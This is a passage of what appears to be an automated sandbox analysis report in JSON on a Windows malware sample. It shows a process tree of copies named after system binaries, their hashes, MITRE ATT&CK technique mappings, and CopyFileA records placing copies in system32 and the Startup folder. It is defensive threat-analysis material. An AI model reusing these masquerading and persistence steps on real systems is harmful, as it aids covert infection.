"name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "d4e4329662ab9814b54afda1f0158734b890546ed2962a603139a0c7eb819bd3"}, {"uid": "00000000-00004372", "parentuid": "00000000-00002452", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "c9005d2d09994810d7b0efe871ecd0688a8dd98cae3b51249e2a1b4fec01c4ee"}, {"uid": "00000000-00001960", "parentuid": "00000000-00002452", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "535827bae7a976d7aa49aaed3fab07c7170ac21d873e5c335d9413f46a53aad8"}, {"uid": "00000000-00002344", "parentuid": "00000000-00002452", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "53f6e40dbf3273dd985f74cdeffed5846abac087de317ede294894198273253c"}, {"uid": "00000000-00003144", "parentuid": "00000000-00002452", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "8060df46cb9580dc1faa95ed30e65fe7295d018be13350069f53bcc84a9a3bbf"}, {"uid": "00000000-00004268", "parentuid": "00000000-00002452", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "e95ee5451b5098a063958adf5a247ecdca22d70414a1cab2bad65dd6f77a5748"}, {"uid": "00000000-00003328", "parentuid": "00000000-00002452", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "9bc6e981f4b5813380ea541c2995de87d3c70d5ead9a3b5301d17e1bf751e6eb"}, {"uid": "00000000-00003996", "parentuid": "00000000-00006008", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "535827bae7a976d7aa49aaed3fab07c7170ac21d873e5c335d9413f46a53aad8"}, {"uid": "00000000-00002444", "parentuid": "00000000-00003996", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "d4e4329662ab9814b54afda1f0158734b890546ed2962a603139a0c7eb819bd3"}, {"uid": "00000000-00005880", "parentuid": "00000000-00003996", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "c9005d2d09994810d7b0efe871ecd0688a8dd98cae3b51249e2a1b4fec01c4ee"}, {"uid": "00000000-00002304", "parentuid": "00000000-00003996", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "535827bae7a976d7aa49aaed3fab07c7170ac21d873e5c335d9413f46a53aad8"}, {"uid": "00000000-00004348", "parentuid": "00000000-00003996", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "53f6e40dbf3273dd985f74cdeffed5846abac087de317ede294894198273253c"}, {"uid": "00000000-00006096", "parentuid": "00000000-00003996", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "8060df46cb9580dc1faa95ed30e65fe7295d018be13350069f53bcc84a9a3bbf"}, {"uid": "00000000-00003280", "parentuid": "00000000-00003996", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "e95ee5451b5098a063958adf5a247ecdca22d70414a1cab2bad65dd6f77a5748"}, {"uid": "00000000-00000132", "parentuid": "00000000-00003996", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "9bc6e981f4b5813380ea541c2995de87d3c70d5ead9a3b5301d17e1bf751e6eb"}, {"uid": "00000000-00001176", "parentuid": "00000000-00006008", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "53f6e40dbf3273dd985f74cdeffed5846abac087de317ede294894198273253c"}, {"uid": "00000000-00000916", "parentuid": "00000000-00001176", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "d4e4329662ab9814b54afda1f0158734b890546ed2962a603139a0c7eb819bd3"}, {"uid": "00000000-00000572", "parentuid": "00000000-00001176", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "c9005d2d09994810d7b0efe871ecd0688a8dd98cae3b51249e2a1b4fec01c4ee"}, {"uid": "00000000-00001340", "parentuid": "00000000-00001176", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "535827bae7a976d7aa49aaed3fab07c7170ac21d873e5c335d9413f46a53aad8"}, {"uid": "00000000-00000356", "parentuid": "00000000-00001176", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "53f6e40dbf3273dd985f74cdeffed5846abac087de317ede294894198273253c"}, {"uid": "00000000-00003596", "parentuid": "00000000-00001176", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "8060df46cb9580dc1faa95ed30e65fe7295d018be13350069f53bcc84a9a3bbf"}, {"uid": "00000000-00003224", "parentuid": "00000000-00001176", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "e95ee5451b5098a063958adf5a247ecdca22d70414a1cab2bad65dd6f77a5748"}, {"uid": "00000000-00004480", "parentuid": "00000000-00001176", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "9bc6e981f4b5813380ea541c2995de87d3c70d5ead9a3b5301d17e1bf751e6eb"}, {"uid": "00000000-00003728", "parentuid": "00000000-00006008", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "8060df46cb9580dc1faa95ed30e65fe7295d018be13350069f53bcc84a9a3bbf"}, {"uid": "00000000-00003232", "parentuid": "00000000-00006008", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "e95ee5451b5098a063958adf5a247ecdca22d70414a1cab2bad65dd6f77a5748"}, {"uid": "00000000-00000952", "parentuid": "00000000-00006008", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "9bc6e981f4b5813380ea541c2995de87d3c70d5ead9a3b5301d17e1bf751e6eb"}, {"uid": "00000000-00002080", "parentuid": "00000000-00000952", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "d4e4329662ab9814b54afda1f0158734b890546ed2962a603139a0c7eb819bd3"}, {"uid": "00000000-00001252", "parentuid": "00000000-00000952", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "c9005d2d09994810d7b0efe871ecd0688a8dd98cae3b51249e2a1b4fec01c4ee"}, {"uid": "00000000-00004012", "parentuid": "00000000-00000952", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "535827bae7a976d7aa49aaed3fab07c7170ac21d873e5c335d9413f46a53aad8"}, {"uid": "00000000-00004064", "parentuid": "00000000-00000952", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "53f6e40dbf3273dd985f74cdeffed5846abac087de317ede294894198273253c"}, {"uid": "00000000-00003920", "parentuid": "00000000-00000952", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "8060df46cb9580dc1faa95ed30e65fe7295d018be13350069f53bcc84a9a3bbf"}, {"uid": "00000000-00003764", "parentuid": "00000000-00000952", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "e95ee5451b5098a063958adf5a247ecdca22d70414a1cab2bad65dd6f77a5748"}, {"uid": "00000000-00003668", "parentuid": "00000000-00000952", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "9bc6e981f4b5813380ea541c2995de87d3c70d5ead9a3b5301d17e1bf751e6eb"}, {"uid": "00000000-00002296", "parentuid": "00000000-00006008", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "70f975dc17af4cd7d182bf9f182deff9050327ca1a11b6259fee3adc81d4d0da"}, {"uid": "00000000-00003620", "parentuid": "00000000-00002296", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "70f975dc17af4cd7d182bf9f182deff9050327ca1a11b6259fee3adc81d4d0da"}, {"uid": "00000000-00005004", "parentuid": "00000000-00002296", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "66c7125471686dc002417c77b1fc99aa00257633592e7d0bf58c3893b0ca9ad2"}, {"uid": "00000000-00005064", "parentuid": "00000000-00002296", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "87e49de69d2fe0f5327c7739fd81f892fe68b9b2e093d3f169431f27391c5984"}, {"uid": "00000000-00003184", "parentuid": "00000000-00002296", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "66c7125471686dc002417c77b1fc99aa00257633592e7d0bf58c3893b0ca9ad2"}, {"uid": "00000000-00004376", "parentuid": "00000000-00006008", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "66c7125471686dc002417c77b1fc99aa00257633592e7d0bf58c3893b0ca9ad2"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Drive-by Compromise", "attck_id": "T1189", "attck_id_wiki": "https://attack.mitre.org/techniques/T1189", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Code Signing Policy Modification", "attck_id": "T1553.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Match Legitimate Name or Location", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005", "malicious_identifiers_count": 2, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 3, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 2, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Domain Trust Discovery", "attck_id": "T1482", "attck_id_wiki": "https://attack.mitre.org/techniques/T1482", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Peripheral Device Discovery", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120", "malicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Removable Media", "attck_id": "T1025", "attck_id_wiki": "https://attack.mitre.org/techniques/T1025", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CopyFileA\" to copy C:\\\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe to new location %WINDIR%\\D3_08.exe (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CopyFileA\" to copy C:\\\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe to new location C:\\D3_08.exe (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CopyFileA\" to copy C:\\\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CopyFileA\" to copy C:\\\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe to new location %WINDIR%\\system32\\MrD3_08.scr (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CopyFileA\" to copy C:\\\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CopyFileA\" to copy C:\\\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00006008)\n 